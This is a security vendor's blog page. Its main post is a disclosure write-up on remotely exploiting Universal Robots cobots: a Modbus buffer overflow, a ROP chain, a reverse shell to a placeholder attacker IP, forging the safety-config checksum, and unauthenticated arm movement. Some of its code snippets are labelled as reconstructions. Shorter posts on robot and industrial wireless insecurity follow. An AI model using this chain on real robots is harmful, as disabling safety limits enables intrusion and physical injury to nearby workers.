RESEARCH | August 22, 2017

Exploiting Industrial Collaborative Robots

Traditional industrial robots are boring. Typically, they are autonomous or operate with limited guidance and execute repetitive, programmed tasks in manufacturing and production settings.1 They are often used to perform duties that are dangerous or unsuitable for workers; therefore, they operate in isolation from humans and other valuable machinery.

This is not the case with the latest generation collaborative robots (“cobots”) though. They function with co-workers in shared workspaces while respecting safety standards. This generation of robots works hand-in-hand with humans, assisting them, rather than just performing automated, isolated operations. Cobots can learn movements, “see” through HD cameras, or “hear” through microphones to contribute to business success.

UR5 by Universal Robots2
Baxter by Rethink Robotics3

So cobots present a much more interesting attack surface than traditional industrial robots. But are cobots only limited to industrial applications? NO, they can also be integrated into other settings!

 
The Moley Robotic Kitchen (2xUR10 Arms)4
DARPA’s ALIAS Robot (UR3 Arm)5
Last February, Cesar Cerrudo (@cesarcer) and I published a non-technical paper “Hacking Robots Before Skynet” previewing our research on several home, business, and industrial robots from multiple well-known vendors. We discovered nearly 50 critical security issues. Within the cobot sector, we audited leading robots, including Baxter/Sawyer from Rethink Robotics and UR by Universal Robots.
  • Baxter/Sawyer: We found authentication issues, insecure transport in their protocols, default deployment problems, susceptibility to physical attacks, and the usage of ROS, a research framework known to be vulnerable to multiple issues. The major problems we reported appear to have been patched by the company in February 2017.
  • UR: We found authentication issues in many of the control protocols, susceptibility to physical attacks, memory corruption vulnerabilities, and insecure communication transport. All of the issues remain unpatched in the latest version (3.4.2.65, May 2017).6

In accordance with IOActive’s responsible disclosure policy we contacted the vendors last January, so they have had ample time to address the vulnerabilities and inform their customers. Our goal is to make cobots more secure and prevent vulnerabilities from being exploited by attackers to cause serious harm to industries, employees, and their surroundings. I truly hope this blog entry moves the collaborative industry forward so we can safely enjoy this and future generations of robots.

In this post, I will discuss how an attacker can chain multiple vulnerabilities in a leading cobot (UR3, UR5, UR10 – Universal Robots) to remotely modify safety settings, violating applicable safety laws and, consequently, causing physical harm to the robot’s surroundings by moving it arbitrarily.

This attack serves as an example of how dangerous these systems can be if they are hacked. Manipulating safety limits and disabling emergency buttons could directly threaten human life. Imagine what could happen if an attack targeted an array of 64 cobots, such as the one deployed at a Chinese industrial corporation.7

The final exploit abuses six vulnerabilities to change safety limits and disable safety planes and emergency buttons/sensors remotely over the network. The cobot arm swings wildly about, wreaking havoc. This video demonstrates the attack: https://www.youtube.com/watch?v=cNVZF7ZhE-8

Q: Can these robots really harm a person?
A: Yes. A study8 by the Control and Robotics Laboratory at the École de technologie supérieure (ÉTS) in Montreal (Canada) clearly shows that even the smaller UR5 model is powerful enough to seriously harm a person. Even while running at slow speeds, its force is more than sufficient to cause a skull fracture.9

Q: Wait…don’t they have safety features that prevent them from harming nearby humans?
A: Yes, but they can be hacked remotely, and I will show you how in the next technical section.

Q: Where are these deployed?
A: All over the world, in multiple production environments, every day.10

Integrators Define All Safety Settings

Universal Robots is the manufacturer of UR robots. The company that installs UR robots in a specific application is the integrator. Only an integrated and installed robot is considered a complete machine. The integrators of UR robots are responsible for ensuring that any significant hazard in the entire robot system is eliminated. This includes, but is not limited to:11

  • Conducting a risk assessment of the entire system. In many countries this is required by law
  • Interfacing other machines and additional safety devices if deemed appropriate by the risk assessment
  • Setting up the appropriate safety settings in the Polyscope software (control panel)
  • Ensuring that the user will not modify any safety measures by using a “safety password”
  • Validating that the entire system is designed and installed correctly

Universal Robots has recognized potentially significant hazards, which must be considered by the integrator, for example:

  • Penetration of skin by sharp edges and sharp points on tools or tool connectors
  • Penetration of skin by sharp edges and sharp points on obstacles near the robot track
  • Bruising due to stroke from the robot
  • Sprain or bone fracture due to strokes between a heavy payload and a hard surface
  • Mistakes due to unauthorized changes to the safety configuration parameters

Some safety-related features are purposely designed for cobot applications. These features are particularly relevant when addressing specific areas in the risk assessment conducted by the integrator, including:

  • Force and power limiting: Used to reduce clamping forces and pressures exerted by the robot in the direction of movement in case of collisions between the robot and operator.
  • Momentum limiting: Used to reduce high-transient energy and impact forces in case of collisions between robot and operator by reducing the speed of the robot.
  • Tool orientation limiting: Used to reduce the risk associated with specific areas and features of the tool and work-piece (e.g., to avoid sharp edges being pointed toward the operator).
  • Speed limitation: Used to ensure the robot arm operates at a low speed.
  • Safety boundaries: Used to restrict the workspace of the robot by forcing it to stay on the correct side of defined virtual planes and not pass through them.

Safety planes in action12


Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.

Safety scanner13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide

Changing Safety Configurations Remotely

“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
 

The exploitation process to remotely change the safety configuration is as follows:

Step 1.    Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server.
Step 2.    Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root.
Step 3.    Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values.
Step 4.    Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice.
Step 5.    Restart the robot so the safety configurations are updated by the new file. This should be done silently.
Step 6.    Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.

By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, although using the simulator was clearer for this example exploit.

Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):
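As a rough illustration, a query along these lines returns the version over the network. This is only a sketch: the Dashboard Server port (29999) is UR’s documented default, but the command string accepted by this particular firmware and the robot address below are assumptions.

    # Minimal sketch of an unauthenticated version query (Step 1).
    # Assumptions: Dashboard Server on TCP 29999; 'PolyscopeVersion' command
    # supported by this firmware; ROBOT_IP is a placeholder.
    import socket

    ROBOT_IP = "192.168.1.10"   # hypothetical controller address

    s = socket.create_connection((ROBOT_IP, 29999), timeout=5)
    print(s.recv(1024).decode(errors="replace").strip())   # greeting banner
    s.sendall(b"PolyscopeVersion\n")                        # command name is an assumption
    print(s.recv(1024).decode(errors="replace").strip())   # version response
    s.close()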


Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).

The UR Modbus TCP service (port 502) does not authenticate the source of a command; therefore, an adversary could put the robot into a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot, or send requests to actuators to change the state of the joints being controlled.

It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary). The stack buffer overflows in a call to the recv function, which uses a user-controlled size to determine how many bytes to copy from the socket into the buffer. This is a very common issue.
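To illustrate the missing source authentication, a raw, unauthenticated Modbus/TCP read can be issued with a few lines of Python. The register address and robot IP below are placeholders for illustration, not documented robot registers.

    # Sketch of an unauthenticated Modbus/TCP "read holding registers" request
    # (function code 0x03). ROBOT_IP and REGISTER are placeholders.
    import socket
    import struct

    ROBOT_IP = "192.168.1.10"
    REGISTER = 0x0100           # hypothetical register address
    COUNT = 1

    pdu = struct.pack(">BHH", 0x03, REGISTER, COUNT)           # function, address, count
    mbap = struct.pack(">HHHB", 0x0001, 0x0000, len(pdu) + 1, 0xFF)  # MBAP header

    s = socket.create_connection((ROBOT_IP, 502), timeout=5)
    s.sendall(mbap + pdu)
    print(s.recv(256).hex())    # raw Modbus response
    s.close()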

Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.

While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.

edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards, when EBX (which is calculated from our previously controlled pointer in EDX) also needs to point to a structure from which a file descriptor is obtained and later closed with “close.”

To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.

I wrote some scripts to find a suitable memory address (a simplified version of that kind of helper is sketched below) and found 0x83aa1fc to be perfect, since it satisfies both conditions:
  • 0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
  • 0x83aa1fc+0x1014 contains 0 (nearly all of this region is zeroed)
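This sketch assumes the static region has been dumped to a file and that its load base and the bounds considered “valid memory” are known; it simply scans for addresses meeting both conditions. All paths and bounds here are assumptions for illustration.

    # Simplified reconstruction of the address-hunting helper.
    # Assumptions: the static region was dumped to 'static_region.bin' and is
    # loaded at BASE; VALID_LO/VALID_HI bound what we treat as valid memory.
    import struct

    BASE = 0x8300000                         # hypothetical load address of the dump
    VALID_LO, VALID_HI = 0x8048000, 0x8400000

    data = open("static_region.bin", "rb").read()

    def u32(off):
        return struct.unpack_from("<I", data, off)[0]

    for off in range(0, len(data) - 0x1018, 4):
        addr = BASE + off
        ptr = u32(off + 0x2c)                # condition 1: *(addr+0x2c) is a valid pointer
        if not (VALID_LO <= ptr < VALID_HI):
            continue
        if u32(off + 0x1014) != 0:           # condition 2: *(addr+0x1014) == 0
            continue
        print("candidate: 0x%08x (ptr -> 0x%08x)" % (addr, ptr))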
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:


At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used return-oriented programming (ROP); the challenge is to find enough gadgets to set up everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I built the chain manually.

First, I focus on my ultimate goal: executing a reverse shell that connects back to my machine. One key point when building a remote ROP-based exploit on Linux is system calls. Depending on the quality of the gadgets that use int instructions I find, I can use primitives such as write or dup2 to reuse the socket that was already created to return a shell, or other post-exploitation strategies.

In this binary, I only found one int 0x80 instruction, which is used to invoke system calls on x86 Linux. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX, in this case 0xb) and a register (EBX) that points to a special structure. This structure contains an array of pointers, each of which points to one of the arguments of the command to be executed.

Because of how this vulnerability is triggered, I cannot use null bytes (0x00) in the request buffer. This is a problem because I need to send commands and arguments and also create an array of pointers that ends with a null byte. To overcome this, I send placeholders, such as chunks of 0xFF bytes, and later replace them with 0x00 at runtime via ROP.

In pseudocode, the call would be (a TCP reverse shell):
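A hedged reconstruction of that pseudocode and of the placeholder layout follows; the exact shell one-liner and attacker address used in the demo are assumptions.

    # Hedged reconstruction of the execve pseudocode and the 0xFF placeholder trick.
    #
    # Target call (pseudocode): execve("/bin/bash", ["/bin/bash", "-c", SHELL], NULL)
    ATTACKER = "10.0.0.1"                                   # hypothetical listener
    SHELL = "bash -i >& /dev/tcp/%s/4444 0>&1" % ATTACKER

    args = [b"/bin/bash", b"-c", SHELL.encode()]

    payload = b""
    for arg in args:
        payload += arg + b"\xff"          # 0xFF stands in for the string's NUL terminator
    payload += b"\xff\xff\xff\xff"        # stands in for the NULL that ends the argv array
    # Pointers to each argument sit at known offsets in the request, and STAGE 1 /
    # STAGE 2 of the ROP chain rewrite every 0xFF placeholder to 0x00 before the
    # single int 0x80 gadget invokes execve.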
 
 
All the controlled data is on the stack, so first I will try to align the stack pointer (ESP) with my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since both can potentially hold many ROP gadgets.

As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.

The following gadget (ROP1 0x8220efa) is used to adjust ESP:

 
 
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
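A quick arithmetic check of the wraparound (the ESP value here is chosen arbitrarily for illustration):

    # 32-bit wraparound check: adding 0xfffffec9 behaves like subtracting 0x137,
    # so ESP + EBX - 1 lands 0x138 bytes below the original ESP.
    esp = 0xBFFFF200                          # hypothetical ESP value
    ebx = 0xFFFFFEC9
    new_esp = (esp + ebx - 1) & 0xFFFFFFFF
    assert new_esp == (esp - 0x137 - 1) & 0xFFFFFFFF
    print(hex(new_esp))                       # 0xbffff0c8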
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
  1. Zero out the 0xFFFFFFFF placeholder at the end of the arguments structure. This way the kernel knows that the execve arguments are only those three pointers.
  2. Save a pointer to our first command of cmd[] in our arguments structure.
  3. Jump to STAGE 2, because I don’t have much space here.
 

STAGE 2 of the exploit does the following:

  1. Zero out the \xff\xff\xff\xff placeholder at the end of each argument in cmd[].
  2. Save pointers to the 2nd and 3rd arguments of cmd[] in our arguments structure.
  3. Prepare the registers for execve. As seen before, we need:
    1. EBX=*args[]
    2. EDX = 0
    3. EAX=0xb
  4. Call the int 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as root in the robot controller.
 
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and saves the calculated checksum on disk. This algorithm does not provide any real integrity for the settings, as it is possible to generate collisions or calculate new checksum values for new settings by overriding special files on the filesystem. I reversed how this calculation is made for each safety setting and created an algorithm that replicates it. In the video demo, I did not fake the new CRC value to keep it the same (shown at the top-right of the screen), even though doing so is possible and easy (Step 4).
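For illustration only, the sketch below computes an STM32-style CRC-32 (the non-reflected MPEG-2 variant implemented by the STM32 hardware unit) over a candidate file. This is a stand-in under that assumption; the per-setting calculation actually used by URControl was reverse engineered from the binary and may differ.

    # Illustrative STM32-style CRC-32 (CRC-32/MPEG-2: poly 0x04C11DB7,
    # init 0xFFFFFFFF, no reflection, no final XOR). Stand-in only; the real
    # per-setting algorithm in URControl may differ.
    def crc32_mpeg2(data: bytes) -> int:
        crc = 0xFFFFFFFF
        for byte in data:
            crc ^= byte << 24
            for _ in range(8):
                if crc & 0x80000000:
                    crc = ((crc << 1) ^ 0x04C11DB7) & 0xFFFFFFFF
                else:
                    crc = (crc << 1) & 0xFFFFFFFF
        return crc

    with open("safety.conf", "rb") as f:      # hypothetical path to the modified file
        print("0x%08X" % crc32_mpeg2(f.read()))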
 
Before modifying any safety setting on the robot, I set up a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This gives me enough time to download, modify, and upload a new safety settings file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell, so I need to create a new process that does not inherit any of its file descriptors, so they are closed when the parent URControl process dies (in order to restart and apply the new safety settings).
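A hedged reconstruction of that helper looks roughly like this; the controller binary’s path and arguments, and the exact delay, are assumptions.

    # Hedged reconstruction of the restart helper (paths, arguments, and timing
    # are assumptions; they may differ on the real controller image).
    import os
    import time

    if os.fork() == 0:                         # child will outlive the reverse shell
        os.setsid()                            # detach from the shell's session
        os.closerange(0, 1024)                 # drop every inherited file descriptor
        time.sleep(25)                         # wait until the new safety.conf is in place
        os.execv("/root/URControl", ["URControl"])   # hypothetical path to the controller binary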
 
 
Now I have 25 seconds to download the current file, modify it, calculate the new CRC, re-upload it, and kill the running URControl process (which still holds the old safety settings). I can programmatically use the kill command to target the current URControl instance (Step 5).
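A minimal way to perform that final kill from the shell session might look like this, assuming pidof is available on the controller image and the process is named URControl.

    # Kill the running URControl instance so the relaunched copy loads the new
    # safety.conf. Process name and availability of 'pidof' are assumptions.
    import subprocess

    pid = subprocess.check_output(["pidof", "URControl"]).split()[0].decode()
    subprocess.check_call(["sudo", "kill", "-9", pid])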
 

Next, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.

 
Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.
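As a sketch, a single unauthenticated URScript line pushed to the controller’s script interface is enough; the port shown (30002, UR’s documented secondary interface) and the joint, acceleration, and velocity values are placeholders.

    # Unauthenticated movej over the controller's script interface (Step 6).
    # Port, joint angles, acceleration, and velocity are placeholder values.
    import socket

    ROBOT_IP = "192.168.1.10"                 # hypothetical controller address
    script = "movej([0.0, -1.57, 1.57, 0.0, 1.57, 0.0], a=3.0, v=3.0)\n"

    s = socket.create_connection((ROBOT_IP, 30002), timeout=5)
    s.sendall(script.encode())
    s.close()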

Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
What are we waiting for?
 
1 https://www.robots.com/faq/show/what-is-an-industrial-robot
2 https://www.roboticsbusinessreview.com/manufacturing/cobot-market-boom-lifts-universal-robots-fortunes-2016/
3 http://www.rethinkrobotics.com/blog/humans-and-collaborative-robots-working-together-in-grand-rapids-mi/
4 https://www.youtube.com/watch?v=G6_LCwu7dOg
5 https://www.wired.com/2016/11/darpa-alias-autonomous-aircraft-aurora-sikorsky/
6 https://www.universal-robots.com/how-tos-and-faqs/faq/ur-faq/release-note-software-version-34xx/
7 https://www.youtube.com/watch?v=PtncirKiBXQ&t=1s
8 http://coro.etsmtl.ca/blog/?p=299
9 http://www.forensicmed.co.uk/pathology/head-injury/skull-fracture/
10 https://www.universal-robots.com/case-stories/
11 https://academy.universal-robots.com
12 https://academy.universal-robots.com
13 Software_Manual_en_US.pdf – Universal Robots

RESEARCH | March 1, 2017

Hacking Robots Before Skynet

Robots are going mainstream in both private and public sectors – on military missions, performing surgery, building skyscrapers, assisting customers at stores, as healthcare attendants, as business assistants, and interacting closely with our families in a myriad of ways. Robots are already showing up in many of these roles today, and in the coming years they will become an ever more prominent part of our home and business lives. But similar to other new technologies, recent IOActive research has found robotic technologies to be highly insecure in a variety of ways that could pose serious threats to the people and organizations they operate in and around.
 
This blog post is intended to provide a brief overview of the full paper we’ve published based on this research, in which we discovered critical cybersecurity issues in several robots from multiple vendors. The goal is to make robots more secure and prevent vulnerabilities from being used maliciously by attackers to cause serious harm to businesses, consumers, and their surroundings. The paper contains more information about the research, findings, and cites many sources used in compiling the information presented in the paper and this post.
 
Robot Adoption and Cybersecurity
Robots are already showing up in thousands of homes and businesses. As many of these “smart” machines are self-propelled, it is important that they’re secure, well protected, and not easy to hack. If not, instead of helpful resources they could quickly become dangerous tools capable of wreaking havoc and causing substantive harm to their surroundings and the humans they’re designed to serve.
 
We’re already experiencing some of the consequences of substantial cybersecurity problems with Internet of Things (IoT) devices that are impacting the Internet, companies and commerce, and individual consumers alike. Cybersecurity problems in robots could have a much greater impact. When you think of robots as computers with arms, legs, or wheels, they become kinetic IoT devices that, if hacked, can pose new serious threats we have never encountered before.
 
With this in mind, we decided to attempt to hack some of the more popular home, business, and industrial robots currently available on the market. Our goal was to assess the cybersecurity of current robots and determine potential consequences of possible cyberattacks. Our results show how insecure and susceptible current robot technology is to cyberattacks, confirming our initial suspicions.
 
Cybersecurity Problems in Today’s Robots
We used our expertise in hacking computers and embedded devices to build a foundation of practical cyberattacks against robot ecosystems. A robot ecosystem is usually composed of the physical robot, an operating system, firmware, software, mobile/remote control applications, vendor Internet services, cloud services, networks, etc. The full ecosystem presents a huge attack surface with numerous options for cyberattacks.
 
We applied risk assessment and threat modeling tools to robot ecosystems to support our research efforts, allowing us to prioritize the critical and high cybersecurity risks for the robots we tested. We focused on assessing the most accessible components of robot ecosystems, such as mobile applications, operating systems, firmware images, and software. Although we didn’t have all the physical robots, it didn’t impact our research results. We had access to the core components, which provide most of the functionality for the robots; we could say these components “bring them to life.”
 
Our research covered home, business, and industrial robots, as well as the control software used by several other robots. The specific robot vendors evaluated in the research are identified in the published research paper.
 
We found nearly 50 cybersecurity vulnerabilities in the robot ecosystem components, many of which were common problems. While this may seem like a substantial number, it’s important to note that our testing was not even a deep, extensive security audit, as that would have taken a much larger investment of time and resources. The goal for this work was to gain a high level sense of how insecure today’s robots are, which we accomplished. We will continue researching this space and go deeper in future projects.
 
An explanation of each main cybersecurity issue discovered is available in the published research paper, but the following is a high-level (non-technical) list of what we found:
  • Insecure Communications
  • Authentication Issues
  • Missing Authorization
  • Weak Cryptography
  • Privacy Issues
  • Weak Default Configuration
  • Vulnerable Open Source Robot Frameworks and Libraries
 
We observed a broad problem in the robotics community: researchers and enthusiasts use the same – or very similar – tools, software, and design practices worldwide. For example, it is common for robots born as research projects to become commercial products with no additional cybersecurity protections; the security posture of the final product remains the same as the research or prototype robot. This practice results in poor cybersecurity defenses, since research and prototype robots are often designed and built with few or no protections. This lack of cybersecurity in commercial robots was clearly evident in our research.
 
Cyberattacks on Robots

Our research uncovered both critical- and high-risk cybersecurity problems in many robot features. Some of them could be directly abused, and others introduce severe threats. Examples of some of the common robot features identified in the research as possible attack threats are as follows:

  • Microphones and Cameras
  • External Services Interaction
  • Remote Control Applications
  • Modular Extensibility
  • Network Advertisement
  • Connection Ports
A full list with descriptions for each is available in the published paper.
 
New technologies are typically prone to security problems, as vendors prioritize time-to-market over security testing. We have seen vendors struggling with a growing number of cybersecurity issues in multiple industries where products are growing more connected, including notably IoT and automotive in recent years. This is usually the result of not considering cybersecurity at the beginning of the product lifecycle; fixing vulnerabilities becomes more complex and expensive after a product is released.
 
The full paper provides an overview of the many implications of insecure robots as they become more prominent in home, business, industry, healthcare, and other applications. We’ve also included many recommendations in the paper for ways to design and build robotic technology more securely based on our findings.
 
Click here for more information on the research and to view the full paper for additional details and descriptions.   
RESEARCH | July 2, 2015

Hacking Wireless Ghosts Vulnerable For Years

Is the risk associated with a Remote Code Execution vulnerability in an industrial plant the same when it affects human life? When calculating risk, certain variables and metrics are combined into equations that are rendered as static numbers, so that risk remediation efforts can be prioritized. But such calculations sometimes ignore the environmental metrics and rely exclusively on exploitability and impact. The practice of scoring vulnerabilities without auditing the potential for collateral damage can underestimate a cyber attack that affects human safety in an industrial plant and leads to catastrophic damage or loss. These deceiving scores are attractive to attackers, since lower-priority security issues are less likely to be resolved on time with a quality remediation.

In the last few years, the world has witnessed advanced cyber attacks against industrial components using complex and expensive malware engineering. Today, the lack of entry points for hacking an isolated process inside an industrial plant means that attacks require a combination of zero-day vulnerabilities and more money.

Two years ago, Carlos Mario Penagos (@binarymantis) and I (Lucas Apa) realized that the most valuable entry point for an attacker is in the air. Radio frequencies leak out of a plant’s perimeter through the high-power antennas that interconnect field devices. Communicating with the target devices from a distance is priceless because it allows an attack to be totally untraceable and frequently unstoppable.

In August 2013 at Black Hat Briefings, we reported multiple vulnerabilities in the industrial wireless products of three vendors and presented our findings. We censored vendor names from our paper to protect the customers who use these products, primarily nuclear, oil and gas, refining, petro-chemical, utility, and wastewater companies mostly based in North America, Latin America, India, and the Middle East (Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and UAE). These companies have trusted expensive but vulnerable wireless sensors to bridge the gap between the physical and digital worlds.

First, we decided to target wireless transmitters (sensors). These sensors gather the physical, real-world values used to monitor conditions, including liquid level, pressure, flow, and temperature. These values are precise enough to be trusted by all of the industrial hardware and machinery in the field. Crucial decisions are based on these numbers. We also targeted wireless gateways, which collect this information and communicate it to the backbone SCADA systems (RTU/EFM/PLC/HMI).

In June 2013, we reported eight different vulnerabilities to the ICS-CERT (Department of Homeland Security). Three months later, one of the vendors, ProSoft Technology, released a patch to mitigate a single vulnerability.

After a patient year, IOActive Labs released an advisory in 2014 titled “OleumTech Wireless Sensor Network Vulnerabilities,” describing four vulnerabilities that could lead to process compromise, public damage, and threats to employee safety, potentially resulting in loss of life.

Figure 1: OleumTech Transmitters infield

The following OleumTech Products are affected:

  • All OleumTech Wireless Gateways: WIO DH2 and Base Unit (RFv1 Protocol)
  • All OleumTech Transmitters and Wireless Modules (RFv1 Protocol)
  • BreeZ v4.3.1.166

An untrusted user or group within a 40-mile range could inject false values into the wireless gateways in order to modify measurements used to make critical decisions. In the following video demonstration, an attacker makes a chemical react and explode by targeting a wireless transmitter that monitors the process temperature. This was possible because a proper failsafe mechanism had not been implemented and physical controls failed. Heavy machinery makes crucial decisions based on the false readings; this could give the attacker control over part of the process.

Figure 2: OleumTech DH2 used as the primary Wireless Gateway to collect wireless end node data.
Video:  Attack launched using a 40 USD RF transceiver and antenna

Industrial embedded systems’ vulnerabilities that can be exploited remotely without needing any internal access are inherently appealing for terrorists.

Mounting a destructive, real-world attack in these conditions is possible. These products are in commercial use in industrial plants all over the world. As if causing unexpected chemical reactions is not enough, exploiting a remote, wireless memory corruption vulnerability could shut down the sensor network of an entire facility for an undetermined period of time.

In May 2015, two years from the initial private vulnerability disclosure, OleumTech created an updated RF protocol version (RFv2) that seems to allow users to encrypt their wireless traffic with AES256. Firmware for all products was updated to support this new feature.

Still, are OleumTech customers aware of how the new AES Encryption key is generated? Which encryption key is the network using?

Figure 3: Picture from OleumTech BreeZ 5 – Default Values (AES Encryption)

Since every hardware device must be removed from its field location for a manual update, what is the cost?

IOActive Labs hasn’t tested these firmware updates. We hope that OleumTech’s technical team performed testing to ensure that the firmware is properly securing radio communications.

I am proud that IOActive has one of the largest professional teams of information security researchers who work with ICS-CERT (DHS) in the world. In addition to identifying critical vulnerabilities and threats for power system facilities, the IOActive team provides security testing directly for control system manufacturers and businesses that have industrial facilities – proactively detecting weaknesses and anticipating exploits in order to improve the safety and operational integrity of technologies.

Needless to say, the companies that rely on vulnerable devices could lose much more than millions of dollars if these vulnerabilities are exploited. These flaws have the potential for massive economic and sociological impact, as well as loss of human life. On the other hand, some attacks are undetectable so it is possible that some of these devices already have been exploited in the wild. We may never know. Fortunately, customers now have a stronger security model and I expect that they now are motivated enough to get involved and ask the vulnerable vendors these open questions.

INSIGHTS | October 22, 2013

NCSAM – Lucas Apa explains the effects of games cheating, 3D modeling, and psychedelic trance music on IT security

I got involved with computers in 1994 when I was six years old. I played games for some years without even thinking about working in the security field. My first contact with the security field was when I started to create “trainers” to cheat on games by manipulating their memory. This led me to find many tutorials related to assembly and cracking in 2001, when my security research began.

The thin line of legality at that time was blurred by actions not considered illegal. This allowed an explosion of hacking groups, material, and magazines. Many of the hacking techniques that still prevail today started in the early years of this century. At that time I lacked good programming skills and an Internet connection in my homeland, Argentina. I got interested in packers and solved many crackmes because I wondered how commercial games built anti-cracking protections. At that time, pirated games were heavily distributed in my country. Having some experience with debuggers allowed me to quickly learn the foundations of programming languages. Many years of self-education and a soon-to-finish computer engineering degree finally gave me sufficient insight to comprehend how modern software works.

When I was a teenager, I also had the opportunity to explore other areas related to computers, such as 3D modeling (animated short films) and producing psychedelic trance music. All these artistic and creative expressions help me appraise and seize an opportunity, especially when seeing how a new exploitation technique works or providing a new innovative solution or approach to a problem.

There was a moment that I realized the serious effort and true thirst I needed to achieve what could be impossible for other people. The security industry is highly competitive, and it sometimes requires extreme skills to provide a comprehensive response or a novel methodology for doing things. The battle between offensive and defensive security has always been entertaining, pushing the barrier of imagination and creativity every time. This awakens true passion in the people who like being part of this game. Every position is important, and the most interesting part is that both sides are convinced that their decisions are right and accurate.

I like to research everything that could be used to play a better offense in real-world scenarios. Learning about technologies and discovering how to break them is something I do for a living. Defensive security has become stronger in some areas and requires more sophisticated techniques to reliably and precisely defeat. Today, hacking skills in general are more difficult to master because of the vast amount of information that is available out there. Great research demands a conceptual vision and being reckless when facing past experiences that show that something is not achievable. My technical interests involve discovering vulnerabilities, writing exploits, and playing offense in CTFs; something close to being inside the quicksand but behind defensive lines. This is one of my favourite feelings, and why I choose to work on security every day.

My first advice to someone who would like to become a pen tester or researcher is to always maintain patience, dedication, and effort. This is a very satisfying career, but it requires a deep and constant learning phase. Having a degree in Computer Science/Engineering will help you get a general overview of how the technology world works, but much of the knowledge and abilities can only be learned and mastered with personal intensive training. Technology changes every year, and future systems could be much different than today’s. The key is to not focus too much on one thing without tasting other fields inside the security world. Fortunately, they can be combined, since in this career all the subjects have the same goal. Learn to appreciate other investigative works, blog posts, and publications; every detail is sometimes the result of weeks or months of work. Information is readily available to everyone; you just need to dive in and start your journey with the topics you like most.

INSIGHTS | July 25, 2013

Las Vegas 2013

Again, that time of the year is approaching; thousands of people from the security community are preparing to head to Las Vegas for the most important hacking events: Black Hat USA and DefCon. IOActive will (as we do every year) have an important presence at these conferences.

We have some great researchers from our team presenting at Black Hat USA and DefCon. At Black Hat USA, Barnaby Jack will be presenting “Implantable medical devices: hacking humans”, and Lucas Apa and Carlos Mario Penagos will be presenting “Compromising industrial facilities from 40 miles away”. At DefCon, Chris Valasek will be presenting “Adventures in automotive networks and control units”.
These will probably be the most talked-about presentations, so don’t miss them!
During Black Hat USA, IOActive will also be hosting IOAsis. This event gives you an opportunity to meet our researchers, listen to some interesting presentations, participate in a hacking hardware workshop, and more—all while enjoying great drinks, food, and a massage.

 

Also back by popular demand and for the third time in a row, IOActive will be sponsoring and hosting Barcon. This is an invitation-only event where our top, l33t, sexy (maybe not) researchers meet to drink and talk.

 

Lastly (but not least), we are once again hosting “Freakshow”, our biggest and most popular DefCon party, on Saturday, August 3rd at 9am at The Rio pools.

 

For your convenience, here are the details on our talks at Black Hat USA and DefCon:

 

IMPLANTABLE MEDICAL DEVICES: HACKING HUMANS
Who: Barnaby Jack
Where & When: Black Hat USA, August 1st, 2:15pm

 

